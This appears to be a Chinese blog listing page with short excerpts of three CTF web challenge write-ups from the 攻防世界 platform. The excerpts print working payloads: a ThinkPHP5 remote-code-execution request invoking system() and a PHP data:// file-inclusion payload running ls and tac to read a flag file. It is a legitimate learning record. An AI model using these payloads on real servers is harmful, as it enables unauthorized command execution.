ctf
ctfmove
这个作者很懒,什么都没留下…
展开
-
攻防世界web高阶(php rce)
需要自己百度下thinkphp5的漏洞(其实看完就知道怎么做这个题目了)payload:s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪s=index/think\App/invokeFunction&function=call_user_func_array&vars原创 2020-07-16 10:40:56 · 612 阅读 · 0 评论 -
攻防世界web高阶(web_php_include)
payload:不过滤大小写,让page=php://?page=data:text/plain,<?php system("ls") ?>?page=data:text/plain,<?php system("tac fl4gisisish3r3.php") ?>data伪协议本例特殊之处在于: 知道文件, 但是 调用 cat、tail、 less、more 并不能显示文件内容,但是 有一个命令 tac:将文件全部内容从尾到头反向连续输出到标准输出(屏幕)上原创 2020-07-16 10:37:54 · 685 阅读 · 0 评论 -
攻防世界web高阶(warm up)
做题目讲究的是方法,我也只是记录我的方法这里我虽然做了代码的注释,但前提要是你需要懂得这些代码的写法和意思,可以学一下php。首先进入主页面,简单的题目一般都在源码里会有提示。f12源代码有个source.php;直接在原网页后面加上/source.php访问(这个要都不知道就真的基础没学好了),开始出现代码先看定义的如何返回file:【if (! empty($_REQUEST['file']) /(接收到的file不为空) && is_string($_REQU原创 2020-07-16 10:29:32 · 577 阅读 · 0 评论